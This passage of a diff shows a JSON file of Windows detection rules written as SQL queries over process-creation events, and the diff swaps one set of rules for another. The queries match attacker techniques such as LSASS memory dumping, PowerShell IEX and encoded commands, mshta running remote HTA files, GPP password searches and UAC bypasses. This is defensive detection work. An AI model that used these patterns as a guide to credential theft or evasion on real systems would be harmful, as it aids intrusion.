ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" + "filename": "proc_creation_win_csc_susp_parent.yml" }, { - "title": "Renamed AdFind Execution", - "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", - "status": "test", - "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "title": "Potential Emotet Activity", + "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "status": "stable", + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (NewProcessName LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_adfind.yml" + "filename": "proc_creation_win_malware_emotet.yml" }, { - "title": "Findstr GPP Passwords", - "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", + "title": "LSASS Memory Dumping", + "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", "status": "test", - "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", - "author": "frack113", + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ "attack.credential_access", - "attack.t1552.006" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_gpp_passwords.yml" + "filename": "proc_creation_win_susp_lsass_dump.yml" }, { - "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", - "id": "b98d0db6-511d-45de-ad02-e82a98729620", + "title": "Python Spawning Pretty TTY on Windows", + "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "status": "experimental", - "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects python spawning a pretty tty", + "author": "Nextron Systems", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218.005" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_http.yml" + "filename": "proc_creation_win_python_pty_spawn.yml" }, { - "title": "Command Line Path Traversal Evasion", - "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", - "status": "experimental", - "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", - "author": "Christian Burkard (Nextron Systems)", + "title": "Potential LethalHTA Technique Execution", + "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "status": "test", + "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", + "author": "Markus Neis", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1218.005" ], "falsepositives": [ - "Google Drive", - "Citrix" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" + "filename": "proc_creation_win_mshta_lethalhta_technique.yml" }, { - "title": "Potential Data Stealing Via Chromium Headless Debugging", - "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", - "status": "experimental", - "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PUA - Radmin Viewer Utility Execution", + "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "status": "test", + "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1185" + "attack.execution", + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" + "filename": "proc_creation_win_pua_radmin.yml" }, { - "title": "Suspicious MSDT Parent Process", - "id": "7a74da6b-ea76-47db-92cc-874ad90df734", - "status": "experimental", - "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", - "author": "Nextron Systems", + "title": "HackTool - F-Secure C3 Load by Rundll32", + "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "status": "test", + "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", + "author": "Alfie Champion (ajpc500)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msdt_susp_parent.yml" + "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" }, { - "title": "Suspicious PowerShell IEX Execution Patterns", - "id": "09576804-7a05-458e-a817-eb718ca91f54", + "title": "HackTool - KrbRelayUp Execution", + "id": "12827a56-61a4-476a-a9cb-f3068f191073", "status": "experimental", - "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "description": "Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" + ], "falsepositives": [ - "Legitimate scripts that use IEX" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_iex_patterns.yml" + "filename": "proc_creation_win_hktl_krbrelayup.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", - "id": "55f0a3a1-846e-40eb-8273-677371b8d912", + "title": "File Download with Headless Browser", + "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", "status": "test", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", + "author": "Sreeman, Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" }, { - "title": "Suspicious Registry Modification From ADS Via Regini.EXE", - "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "title": "Tamper Windows Defender Remove-MpPreference", + "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", "status": "experimental", - "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", - "author": "Eli Salem, Sander Wiebing, oscd.community", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regini_ads.yml" + "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" }, { - "title": "UAC Bypass Using DismHost", - "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "title": "UAC Bypass WSReset", + "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", "status": "test", - "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", @@ -9499,798 +9243,736 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_uac_bypass_dismhost.yml" + "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" }, { - "title": "Potential PowerShell Obfuscation Via Reversed Commands", - "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", - "status": "test", - "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "title": "PUA - Process Hacker / System Informer Execution", + "id": "811e0002-b13b-4a15-9d00-a613fce66e42", + "status": "experimental", + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Sometimes used by developers or system administrators for debugging purposes" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + ], + "filename": "proc_creation_win_pua_process_hacker.yml" + }, + { + "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", + "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "status": "experimental", + "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" + "filename": "proc_creation_win_net_use_mount_internet_share.yml" }, { - "title": "UNC2452 PowerShell Pattern", - "id": "b7155193-8a81-4d8f-805d-88de864ca50c", - "status": "test", - "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Schtasks Schedule Types", + "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "status": "experimental", + "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.t1047" + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Legitimate processes that run at logon. Filter according to your environment" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Invoke-WMIMethod win32\\_process -name create -argumentlist%' ESCAPE '\\' AND CommandLine LIKE '%rundll32 c:\\\\windows%' ESCAPE '\\') OR (CommandLine LIKE '%wmic /node:%' ESCAPE '\\' AND CommandLine LIKE '%process call create \"rundll32 c:\\\\windows%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_unc2452_ps.yml" + "filename": "proc_creation_win_schtasks_schedule_type.yml" }, { - "title": "Schtasks From Suspicious Folders", - "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", + "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", + "id": "5b768e71-86f2-4879-b448-81061cbae951", "status": "experimental", - "description": "Detects scheduled task creations that have suspicious action command and folder combinations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' 